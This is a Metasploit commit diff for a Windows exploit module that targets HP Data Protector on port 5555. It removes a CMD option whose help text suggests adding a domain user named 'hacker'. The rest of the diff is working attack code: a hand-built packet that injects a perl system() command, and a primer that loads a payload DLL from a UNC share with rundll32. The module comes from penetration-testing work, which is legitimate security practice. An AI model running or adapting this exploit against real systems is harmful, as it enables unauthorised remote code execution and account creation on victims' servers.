Delete CMD option

jvazquez-r7 · jvazquez-r7 · commit e04ff3ee2417 · 2015-03-04T11:51:58.000-06:00
diff --git a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
@@ -45,7 +45,6 @@ def initialize(info={})
       register_options(
         [
           Opt::RPORT(5555),
-          OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
           OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
         ], self.class)
 
@@ -92,52 +91,29 @@ def get_fingerprint
   end
 
   def exec_bar(cmd)
-    connect
-    cmd = cmd.gsub("\\", "\\\\\\\\")
-    vprint_status("Sending Command: #{cmd}")
+    cmd.gsub!("\\", "\\\\\\\\")
+
     cmd_no = target['Offset'] + cmd.length
-    vprint_status("Size is #{cmd_no}")
+
     pkt = "\x00\x00\x00"
     pkt << cmd_no
     pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
     pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
     pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
     pkt << "('#{cmd}')" # Executable
     pkt << "\x00"
-    sock.put(pkt)
-    # In my testing the default timeout (10) isn't enough
-    if datastore['CMD']
-      begin
-       res = sock.get_once(-1, 20)
-      rescue EOFError # happens when using the Powershell method
-       disconnect
-       return
-      end
-      fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
-      disconnect
-    else
-     handler
-     disconnect
-    end
-  end
 
-  def exec_bar?(data)
-    return false if data.blank?
-    data_unpacked = data.unpack("NnVv")
-    data_unpacked.length == 4 && data_unpacked[0] == 16 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x39 && data_unpacked[3] == 0x20
+    connect
+    sock.put(pkt)
+    disconnect
   end
 
   def primer
-    if datastore['CMD']
-      print_status("Executing command #{datastore['CMD']}")
-      exec_bar(datastore['CMD'])
-    else
-      self.file_contents = generate_payload_dll
-      print_status("File available on #{unc}...")
-      print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{unc}")
-      sploit = "rundll32.exe #{unc},"
-      sploit << rand_text_numeric(1)
-      exec_bar(sploit)
-    end
+    self.file_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
+
+    print_status("#{peer} - Trying to execute remote DLL...")
+    sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
+    exec_bar(sploit)
   end
 end
